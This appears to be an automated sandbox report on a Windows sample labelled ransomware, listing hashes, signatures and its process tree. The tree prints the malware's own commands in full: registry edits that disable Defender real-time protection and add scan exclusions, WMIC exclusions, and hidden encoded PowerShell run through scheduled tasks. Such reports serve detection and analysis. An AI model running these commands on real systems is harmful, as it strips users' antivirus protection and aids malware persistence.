Analysis
-
max time kernel
99s -
max time network
99s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
24-05-2024 17:24
Static task
static1
Behavioral task
behavioral1
Sample
2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
Resource
win7-20240508-en
General
-
Target
2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
-
Size
6.6MB
-
MD5
11070066a80109c22a00ac720006bbaa
-
SHA1
40158a0a3eb6005cc573903048200a0e436be246
-
SHA256
c1ae3f49094b9542b0ebdccba02fd1dabc49750ffe4ddbe38661ef3949181880
-
SHA512
3830aff85e7743650a2834dce51965dd1c8e27655664d2a637e6608c7c03f07d186d4af24db37e83dae03c3c3b9a6af2813372e23af0f3dab276a147f516f1e0
-
SSDEEP
98304:asuaZIj7qC0HX1apUVCvCrgtepFLUiXC2zirJYYdD9acfC7m+uAWUrBscFFK7IjV:lNZIOXAUCo9wJ2mruEscqrWUrc76P
Malware Config
Signatures
-
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\AmZMNEdugmHLdDkPv = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ujRQKhsomqXgC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\jbMfBZnRCYwXWnVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\OrbPdMUPlnYWuuDN = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PHshpGZGOCOU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PKitbTPXU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gIbkOBIdgRUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\OrbPdMUPlnYWuuDN = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LmPBUjorYOxoMDhifcR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXEpid process 2672 powershell.exe 2516 powershell.EXE 2632 powershell.EXE 2180 powershell.exe 1556 powershell.EXE -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
Processes:
2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpgljbjinlladnbmjndbjoohkjjcmidj\1.1.0_0\manifest.json 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe -
Drops file in System32 directory 9 IoCs
Processes:
2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exepowershell.EXEpowershell.exepowershell.exepowershell.EXEpowershell.EXEdescription ioc process File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe File created C:\Windows\system32\GroupPolicy\gpt.ini 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Drops file in Program Files directory 13 IoCs
Processes:
2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exedescription ioc process File created C:\Program Files (x86)\PKitbTPXU\lwrzhv.dll 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe File created C:\Program Files (x86)\PKitbTPXU\oMnXPgn.xml 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe File created C:\Program Files (x86)\PHshpGZGOCOU2\tlhwkrLzThjvL.dll 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe File created C:\Program Files (x86)\LmPBUjorYOxoMDhifcR\OZIlESS.dll 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe File created C:\Program Files (x86)\LmPBUjorYOxoMDhifcR\jSWGjfx.xml 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe File created C:\Program Files (x86)\ujRQKhsomqXgC\YfXWsUL.xml 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{3F73A70E-44C0-48A7-A9B6-A040BC51379C}.xpi 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe File created C:\Program Files (x86)\PHshpGZGOCOU2\dfVGIgT.xml 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe File created C:\Program Files\Mozilla Firefox\browser\features\{3F73A70E-44C0-48A7-A9B6-A040BC51379C}.xpi 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe File created C:\Program Files (x86)\gIbkOBIdgRUn\DjxOPzc.dll 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe File created C:\Program Files (x86)\ujRQKhsomqXgC\DcrKsOm.dll 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Windows\Tasks\fErPICTAIBeQfSA.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 236 1976 WerFault.exe 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe -
Creates scheduled task(s) 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2432 schtasks.exe 2300 schtasks.exe 1188 schtasks.exe 2184 schtasks.exe 2148 schtasks.exe 2640 schtasks.exe 988 schtasks.exe 2924 schtasks.exe 1728 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 36 IoCs
Processes:
powershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXE2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exepid process 2672 powershell.exe 2672 powershell.exe 2672 powershell.exe 2516 powershell.EXE 2516 powershell.EXE 2516 powershell.EXE 2632 powershell.EXE 2632 powershell.EXE 2632 powershell.EXE 2180 powershell.exe 1556 powershell.EXE 1556 powershell.EXE 1556 powershell.EXE 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
powershell.exepowershell.EXEpowershell.EXEpowershell.exeWMIC.exepowershell.EXEdescription pid process Token: SeDebugPrivilege 2672 powershell.exe Token: SeDebugPrivilege 2516 powershell.EXE Token: SeDebugPrivilege 2632 powershell.EXE Token: SeDebugPrivilege 2180 powershell.exe Token: SeIncreaseQuotaPrivilege 1608 WMIC.exe Token: SeSecurityPrivilege 1608 WMIC.exe Token: SeTakeOwnershipPrivilege 1608 WMIC.exe Token: SeLoadDriverPrivilege 1608 WMIC.exe Token: SeSystemProfilePrivilege 1608 WMIC.exe Token: SeSystemtimePrivilege 1608 WMIC.exe Token: SeProfSingleProcessPrivilege 1608 WMIC.exe Token: SeIncBasePriorityPrivilege 1608 WMIC.exe Token: SeCreatePagefilePrivilege 1608 WMIC.exe Token: SeBackupPrivilege 1608 WMIC.exe Token: SeRestorePrivilege 1608 WMIC.exe Token: SeShutdownPrivilege 1608 WMIC.exe Token: SeDebugPrivilege 1608 WMIC.exe Token: SeSystemEnvironmentPrivilege 1608 WMIC.exe Token: SeRemoteShutdownPrivilege 1608 WMIC.exe Token: SeUndockPrivilege 1608 WMIC.exe Token: SeManageVolumePrivilege 1608 WMIC.exe Token: 33 1608 WMIC.exe Token: 34 1608 WMIC.exe Token: 35 1608 WMIC.exe Token: SeDebugPrivilege 1556 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exedescription pid process target process PID 1976 wrote to memory of 2984 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe cmd.exe PID 1976 wrote to memory of 2984 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe cmd.exe PID 1976 wrote to memory of 2984 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe cmd.exe PID 1976 wrote to memory of 2984 1976 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe cmd.exe PID 2984 wrote to memory of 2564 2984 cmd.exe forfiles.exe PID 2984 wrote to memory of 2564 2984 cmd.exe forfiles.exe PID 2984 wrote to memory of 2564 2984 cmd.exe forfiles.exe PID 2984 wrote to memory of 2564 2984 cmd.exe forfiles.exe PID 2564 wrote to memory of 3040 2564 forfiles.exe cmd.exe PID 2564 wrote to memory of 3040 2564 forfiles.exe cmd.exe PID 2564 wrote to memory of 3040 2564 forfiles.exe cmd.exe PID 2564 wrote to memory of 3040 2564 forfiles.exe cmd.exe PID 3040 wrote to memory of 2596 3040 cmd.exe reg.exe PID 3040 wrote to memory of 2596 3040 cmd.exe reg.exe PID 3040 wrote to memory of 2596 3040 cmd.exe reg.exe PID 3040 wrote to memory of 2596 3040 cmd.exe reg.exe PID 2984 wrote to memory of 2604 2984 cmd.exe forfiles.exe PID 2984 wrote to memory of 2604 2984 cmd.exe forfiles.exe PID 2984 wrote to memory of 2604 2984 cmd.exe forfiles.exe PID 2984 wrote to memory of 2604 2984 cmd.exe forfiles.exe PID 2604 wrote to memory of 2560 2604 forfiles.exe cmd.exe PID 2604 wrote to memory of 2560 2604 forfiles.exe cmd.exe PID 2604 wrote to memory of 2560 2604 forfiles.exe cmd.exe PID 2604 wrote to memory of 2560 2604 forfiles.exe cmd.exe PID 2560 wrote to memory of 2700 2560 cmd.exe reg.exe PID 2560 wrote to memory of 2700 2560 cmd.exe reg.exe PID 2560 wrote to memory of 2700 2560 cmd.exe reg.exe PID 2560 wrote to memory of 2700 2560 cmd.exe reg.exe PID 2984 wrote to memory of 2704 2984 cmd.exe forfiles.exe PID 2984 wrote to memory of 2704 2984 cmd.exe forfiles.exe PID 2984 wrote to memory of 2704 2984 cmd.exe forfiles.exe PID 2984 wrote to memory of 2704 2984 cmd.exe forfiles.exe PID 2704 wrote to memory of 2716 2704 forfiles.exe cmd.exe PID 2704 wrote to memory of 2716 2704 forfiles.exe cmd.exe PID 2704 wrote to memory of 2716 2704 forfiles.exe cmd.exe PID 2704 wrote to memory of 2716 2704 forfiles.exe cmd.exe PID 2716 wrote to memory of 2736 2716 cmd.exe reg.exe PID 2716 wrote to memory of 2736 2716 cmd.exe reg.exe PID 2716 wrote to memory of 2736 2716 cmd.exe reg.exe PID 2716 wrote to memory of 2736 2716 cmd.exe reg.exe PID 2984 wrote to memory of 2856 2984 cmd.exe forfiles.exe PID 2984 wrote to memory of 2856 2984 cmd.exe forfiles.exe PID 2984 wrote to memory of 2856 2984 cmd.exe forfiles.exe PID 2984 wrote to memory of 2856 2984 cmd.exe forfiles.exe PID 2856 wrote to memory of 2608 2856 forfiles.exe cmd.exe PID 2856 wrote to memory of 2608 2856 forfiles.exe cmd.exe PID 2856 wrote to memory of 2608 2856 forfiles.exe cmd.exe PID 2856 wrote to memory of 2608 2856 forfiles.exe cmd.exe PID 2608 wrote to memory of 2844 2608 cmd.exe reg.exe PID 2608 wrote to memory of 2844 2608 cmd.exe reg.exe PID 2608 wrote to memory of 2844 2608 cmd.exe reg.exe PID 2608 wrote to memory of 2844 2608 cmd.exe reg.exe PID 2984 wrote to memory of 2688 2984 cmd.exe forfiles.exe PID 2984 wrote to memory of 2688 2984 cmd.exe forfiles.exe PID 2984 wrote to memory of 2688 2984 cmd.exe forfiles.exe PID 2984 wrote to memory of 2688 2984 cmd.exe forfiles.exe PID 2688 wrote to memory of 2724 2688 forfiles.exe cmd.exe PID 2688 wrote to memory of 2724 2688 forfiles.exe cmd.exe PID 2688 wrote to memory of 2724 2688 forfiles.exe cmd.exe PID 2688 wrote to memory of 2724 2688 forfiles.exe cmd.exe PID 2724 wrote to memory of 2672 2724 cmd.exe powershell.exe PID 2724 wrote to memory of 2672 2724 cmd.exe powershell.exe PID 2724 wrote to memory of 2672 2724 cmd.exe powershell.exe PID 2724 wrote to memory of 2672 2724 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe"1⤵
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gsKvgayyk" /SC once /ST 08:02:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gsKvgayyk"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gsKvgayyk"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gdRBvwRVC" /SC once /ST 10:49:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gdRBvwRVC"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gdRBvwRVC"2⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"2⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:323⤵
-
